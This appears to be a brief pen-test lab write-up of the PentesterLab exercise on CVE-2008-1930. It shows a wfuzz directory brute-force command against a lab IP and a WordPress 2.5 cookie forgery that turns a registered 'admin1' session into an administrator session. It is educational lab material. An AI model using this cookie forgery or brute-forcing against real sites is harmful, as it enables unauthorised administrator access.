CVE-2008-1930 Wordpress 2.5 Cookie Integrity Protection Vulnerability

Wake up..Neo.. The Matrix HAS YOU —–the Matrix

From pentesterlab This course details the exploitation of an issue in the cookies integrity mechanism of Wordpress. This issue was found in 2008 and allowed an attacker to gain administrator access to a wordpress instance if user registration is enabled.

Difficluty: 2/5

Forces:

Cookie Manager+
wfuzz

Waging War

Weaknesses and Strengths

Use wfuzz to burte force hidden path of the server

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.168/FUZZ 2>/dev/null

[title manually exploit [alt text]]

next step, we use admin1 and password pentesterlab to login as user admin1

[title manually exploit [alt text]]

here we can use Cookie Manager+ to view the cookies we got.

[title manually exploit [alt text]]

modify cookie from admin1%7C1461188835%7Ce6cf864114aa5acaae0795ff56b333b0 to admin%7C11461188835%7Ce6cf864114aa5acaae0795ff56b333b0, reload the page, now we are in admin’s session.

[title manually exploit [alt text]]

Bob1Bob2

Pen Test Notes